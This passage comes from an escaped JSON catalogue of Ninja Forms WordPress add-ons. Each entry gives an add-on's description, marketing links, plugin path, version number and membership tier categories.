Export\",\"image\":\"assets\\/img\\/add-ons\\/excel-export.png\",\"content\":\"Export any form\'s submissions as a Microsoft Excel spreadsheet. Choose a date range, the fields you want to include, and export to Excel! \",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/excel-export\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Excel+Export\",\"plugin\":\"ninja-forms-excel-export\\/ninja-forms-excel-export.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/excel-export\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Excel+Export+Docs\",\"version\":\"3.3.5\",\"categories\":[{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"File Management\",\"slug\":\"file-management\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Manage Submissions\",\"slug\":\"manage-submissions\"},{\"name\":\"Advanced Functionality\",\"slug\":\"advanced-functionality\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Help Scout\",\"image\":\"assets\\/img\\/add-ons\\/help-scout.png\",\"content\":\"Offering great support is hard. Tailor your WordPress forms to match your customers\' needs with this Help Scout integration for WordPress.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/help-scout\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Help+Scout\",\"plugin\":null,\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/help-scout\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Help+Scout+Docs\",\"version\":\"3.1.3\",\"categories\":[{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Manage Users\",\"slug\":\"user-management\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Automation and Integration\",\"slug\":\"automation-and-integration\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Emma\",\"image\":\"assets\\/img\\/add-ons\\/emma.png\",\"content\":\"Take your email marketing further with handcrafted, easy to build signup forms that connect directly into your Emma account! \",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/emma\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Emma\",\"plugin\":\"ninja-forms-emma\\/ninja-forms-emma.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/emma\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Emma+Docs\",\"version\":\"3.0.4\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Plus 2023\",\"slug\":\"plus-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"ClickSend SMS\",\"image\":\"assets\\/img\\/add-ons\\/clicksend-sms.png\",\"content\":\"Get instant SMS notifications with every new WordPress form submission. Respond to leads faster and make more personal connections!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/clicksend-sms\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=ClickSend+SMS\",\"plugin\":\"ninja-forms-clicksend\\/ninja-forms-clicksend.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/clicksend-sms\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=ClickSend+SMS+Docs\",\"version\":\"3.0.1\",\"categories\":[{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Notification and Workflow\",\"slug\":\"notification-workflow\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"SMS Notifications\",\"slug\":\"sms-notifications\"},{\"name\":\"Automation and Integration\",\"slug\":\"automation-and-integration\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Twilio SMS\",\"image\":\"assets\\/img\\/add-ons\\/twilio-sms.png\",\"content\":\"Get instant SMS notifications with every new WordPress form submission. Respond to leads faster and make more personal connections!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/twilio\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Twilio+SMS\",\"plugin\":\"ninja-forms-twilio\\/ninja-forms-twilio.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/twilio\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Twilio+SMS+Docs\",\"version\":\"3.0.1\",\"categories\":[{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Notification and Workflow\",\"slug\":\"notification-workflow\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"SMS Notifications\",\"slug\":\"sms-notifications\"},{\"name\":\"Automation and Integration\",\"slug\":\"automation-and-integration\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Recurly\",\"image\":\"assets\\/img\\/add-ons\\/recurly.png\",\"content\":\"Subscription plans a part of your business model? Let your users subscribe from any WordPress form & make management easier with Recurly!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/recurly\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Recurly\",\"plugin\":\"ninja-forms-recurly\\/ninja-forms-recurly.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/recurly\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Recurly+Docs\",\"version\":\"3.0.5\",\"categories\":[{\"name\":\"Payment Gateways\",\"slug\":\"payment-gateways\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Accept Payments\",\"slug\":\"accept-payments\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Save Progress\",\"image\":\"assets\\/img\\/add-ons\\/save-progress.png\",\"content\":\"Let your users save their work and reload it all when they have time to return. Don\'t lose out on valuable submissions for longer forms!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/save-progress\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Save+Progress\",\"plugin\":\"ninja-forms-save-progress\\/ninja-forms-save-progress.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/save-progress\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Save+Progress+Docs\",\"version\":\"3.0.28\",\"categories\":[{\"name\":\"Content Management\",\"slug\":\"content-management\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Form Function and Design\",\"slug\":\"form-function-design\"},{\"name\":\"Manage Users\",\"slug\":\"user-management\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Advanced Functionality\",\"slug\":\"advanced-functionality\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"EmailOctopus\",\"image\":\"assets\\/img\\/add-ons\\/emailoctopus.png\",\"content\":\"Pair WordPress\' best drag and drop form builder with your EmailOctopus account for incredibly effective signup forms. Easy, complete integration.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/emailoctopus\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=EmailOctopus\",\"plugin\":\"ninja-forms-emailoctopus\\/ninja-forms-emailoctopus.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/emailoctopus\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=EmailOctopus+Docs\",\"version\":\"3.0.1\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Plus 2023\",\"slug\":\"plus-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Pipeline CRM\",\"image\":\"assets\\/img\\/add-ons\\/pipelinedeals-crm.png\",\"content\":\"Complete, effortless integration with Pipeline CRM. Increase the flow of leads into your sales pipeline with upgraded lead generation forms!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/pipelinedeals-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Pipeline+CRM\",\"plugin\":\"ninja-forms-zoho-crm\\/zoho-integration.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/pipelinedeals-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Pipeline+CRM+Docs\",\"version\":\"3.0.2\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"CRMs\",\"slug\":\"crms\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"ConvertKit\",\"image\":\"assets\\/img\\/add-ons\\/convertkit.png\",\"content\":\"Connect WordPress to your ConvertKit account with completely customizable opt-in forms. Watch your audience & sales grow like never before!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/convertkit\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=ConvertKit\",\"plugin\":\"ninja-forms-convertkit\\/ninja-forms-convertkit.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/convertkit\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=ConvertKit+Docs\",\"version\":\"3.1.1\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Plus 2023\",\"slug\":\"plus-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"OnePageCRM\",\"image\":\"assets\\/img\\/add-ons\\/onepage-crm.png\",\"content\":\"Integrate WordPress with OnePage CRM seamlessly through highly customizable WordPress forms. Make better conversions <em>your<\\/em> Next Action!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/onepage-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=OnePageCRM\",\"plugin\":\"ninja-forms-onepage-crm\\/ninja-forms-onepage-crm.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/onepage-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=OnePageCRM+Docs\",\"version\":\"3.0.4\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"CRMs\",\"slug\":\"crms\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"ActiveCampaign\",\"image\":\"assets\\/img\\/add-ons\\/active-campaign.png\",\"content\":\"Design custom forms that link perfectly to your ActiveCampaign account for the ultimate in marketing automation. Better leads begin here!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/activecampaign\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=ActiveCampaign\",\"plugin\":\"ninja-forms-active-campaign\\/ninja-forms-active-campaign.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/activecampaign\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=ActiveCampaign+Docs\",\"version\":\"3.1.2\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Plus 2023\",\"slug\":\"plus-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Agency Membership\",\"image\":\"assets\\/img\\/add-ons\\/ninja-forms-membership-bundle-2.png\",\"content\":\"Get every single Ninja Forms add-ons, at an amazingly discounted price.\",\"link\":\"https:\\/\\/ninjaforms.com\\/documentation\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Agency+Membership\",\"plugin\":null,\"docs\":\"https:\\/\\/ninjaforms.com\\/documentation\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Agency+Membership+Docs\",\"version\":null,\"categories\":[{\"name\":\"Deprecated\",\"slug\":\"deprecated\"},{\"name\":\"Member Bundle\",\"slug\":\"member-bundle\"}]},{\"title\":\"Personal Membership\",\"image\":\"assets\\/img\\/add-ons\\/individual-membership-2.png\",\"content\":\"Get our most popular add-ons at an amazingly discounted price. Perfect for the single site owner.\",\"link\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Personal+Membership\",\"plugin\":null,\"docs\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Personal+Membership+Docs\",\"version\":null,\"categories\":[{\"name\":\"Deprecated\",\"slug\":\"deprecated\"},{\"name\":\"Member Bundle\",\"slug\":\"member-bundle\"}]},{\"title\":\"Professional Membership\",\"image\":\"assets\\/img\\/add-ons\\/professional-membership-2.png\",\"content\":\"Get our 4 most popular add-ons at an amazingly discounted price. Perfect for your Do It Yourself business owner.\",\"link\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Professional+Membership\",\"plugin\":null,\"docs\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Professional+Membership+Docs\",\"version\":null,\"categories\":[{\"name\":\"Deprecated\",\"slug\":\"deprecated\"},{\"name\":\"Member Bundle\",\"slug\":\"member-bundle\"}]},{\"title\":\"HubSpot\",\"image\":\"assets\\/img\\/add-ons\\/hubspot-crm.png\",\"content\":\"Looking for an easier way to connect HubSpot with WordPress? Need more flexibility and features for your HubSpot forms? This is your answer.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/hubspot\\/ \\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=HubSpot\",\"plugin\":\"ninja-forms-hubspot\\/ninja-forms-hubspot.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/hubspot\\/ \\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=HubSpot+Docs\",\"version\":\"3.0.8\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"CRMs\",\"slug\":\"crms\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Advanced Datepicker\",\"image\":\"assets\\/img\\/add-ons\\/advanced-datepicker.png\",\"content\":\"Let your users book dates and times for appointments and more directly from any WordPress form!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/advanced-datepicker\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Advanced+Datepicker\",\"plugin\":\"ninja-forms-advanced-datepicker\\/ninja-forms-advanced-datepicker-3.2.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/advanced-datepicker\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Advanced+Datepicker+Docs\",\"version\":\"3.3.1\",\"categories\":[{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Form Function and Design\",\"slug\":\"form-function-design\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Most Popular\",\"slug\":\"most-popular\"},{\"name\":\"Advanced Functionality\",\"slug\":\"advanced-functionality\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Authorize.net\",\"image\":\"assets\\/img\\/add-ons\\/authorize-net.png\",\"content\":\"Looking for a fast, simple way to connect WordPress to Authorize.net? The Authorize.net add-on is your ticket!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/authorize-net\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Authorize.net\",\"plugin\":\"ninja-forms-authorize-net\\/ninja-forms-authorize-net.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/authorize-net\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Authorize.net+Docs\",\"version\":\"3.1.1\",\"categories\":[{\"name\":\"Payment Gateways\",\"slug\":\"payment-gateways\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Accept Payments\",\"slug\":\"accept-payments\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Basic Membership 2022\",\"image\":\"assets\\/img\\/add-ons\\/basic-membership.png\",\"content\":\"\",\"link\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Basic+Membership+2022\",\"plugin\":null,\"docs\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Basic+Membership+2022+Docs\",\"version\":null,\"categories\":[{\"name\":\"Member Bundle\",\"slug\":\"member-bundle\"}]},{\"title\":\"Plus Membership 2022\",\"image\":\"assets\\/img\\/add-ons\\/plus-membership.png\",\"content\":\"\",\"link\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Plus+Membership+2022\",\"plugin\":null,\"docs\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Plus+Membership+2022+Docs\",\"version\":null,\"categories\":[{\"name\":\"Member Bundle\",\"slug\":\"member-bundle\"}]},{\"title\":\"Pro Membership 2022\",\"image\":\"assets\\/img\\/add-ons\\/pro-membership.png\",\"content\":\"\",\"link\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Pro+Membership+2022\",\"plugin\":null,\"docs\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Pro+Membership+2022+Docs\",\"version\":null,\"categories\":[{\"name\":\"Member Bundle\",\"slug\":\"member-bundle\"}]},{\"title\":\"Elite Membership 2022\",\"image\":\"assets\\/img\\/add-ons\\/elite-membership.png\",\"content\":\"\",\"link\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Elite+Membership+2022\",\"plugin\":null,\"docs\":\"\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Elite+Membership+2022+Docs\",\"version\":null,\"categories\":[{\"name\":\"Member Bundle\",\"slug\":\"member-bundle\"}]},{\"title\":\"Scheduled Submissions Export\",\"image\":\"assets\\/img\\/add-ons\\/scheduled-submissions-export.png\",\"content\":\"Use Scheduled Submissions Export to set hourly, daily, or weekly exports of any WordPress form submissions to any email address(es)!\",\"link\":\" https:\\/\\/ninjaforms.com\\/extensions\\/scheduled-submissions-export\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Scheduled+Submissions+Export\",\"plugin\":\"ninja-forms-scheduled-exports\\/ninja-forms-scheduled-exports.php\",\"docs\":\" https:\\/\\/ninjaforms.com\\/docs\\/scheduled-submissions-export\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Scheduled+Submissions+Export+Docs\",\"version\":\"3.0.3\",\"categories\":[{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"File Management\",\"slug\":\"file-management\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Manage Submissions\",\"slug\":\"manage-submissions\"},{\"name\":\"Advanced Functionality\",\"slug\":\"advanced-functionality\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"CiviCRM\",\"image\":\"assets\\/img\\/add-ons\\/civicrm.png\",\"content\":\"Connect & update your CiviCRM account from any WordPress form with the Ninja Forms CiviCRM add-on. Easily add or update Contacts & Activities!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/civicrm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=CiviCRM\",\"plugin\":\"ninja-forms-civicrm\\/ninja-forms-civicrm.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/civicrm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=CiviCRM+Docs\",\"version\":\"3.0.1\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"CRMs\",\"slug\":\"crms\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"File Uploads\",\"image\":\"assets\\/img\\/add-ons\\/file-uploads.png\",\"content\":\"Add file upload fields to any WordPress form. Set allowed file types, sizes, upload directories and save to WordPress, Google Drive and more.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/file-uploads\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=File+Uploads\",\"plugin\":\"ninja-forms-uploads\\/file-uploads.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/file-uploads\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=File+Uploads+Docs\",\"version\":\"3.3.16\",\"categories\":[{\"name\":\"Content Management\",\"slug\":\"content-management\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"File Management\",\"slug\":\"file-management\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Basic 2022\",\"slug\":\"basic-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Most Popular\",\"slug\":\"most-popular\"},{\"name\":\"Advanced Functionality\",\"slug\":\"advanced-functionality\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Plus 2023\",\"slug\":\"plus-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"User Management\",\"image\":\"assets\\/img\\/add-ons\\/user-management.png\",\"content\":\"Let users register, login, & manage profiles with customizable form templates. Allow user roles to view or edit form submissions. \",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/user-management\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=User+Management\",\"plugin\":\"ninja-forms-user-management\\/ninja-forms-user-management.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/user-management\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=User+Management+Docs\",\"version\":\"3.2.1\",\"categories\":[{\"name\":\"Content Management\",\"slug\":\"content-management\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Manage Users\",\"slug\":\"user-management\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Advanced Functionality\",\"slug\":\"advanced-functionality\"},{\"name\":\"Memberships 2023\",\"slug\":\"memberships-2023\"},{\"name\":\"Pro 2023\",\"slug\":\"pro-2023\"},{\"name\":\"Elite 2023\",\"slug\":\"elite-2023\"}]},{\"title\":\"Layout and Styles\",\"image\":\"assets\\/img\\/add-ons\\/layout-styles.png\",\"content\":\"Edit form styles. Create two column forms. Multi column forms. Easily adjust form layout. You don\'t need a designer, just Layout and 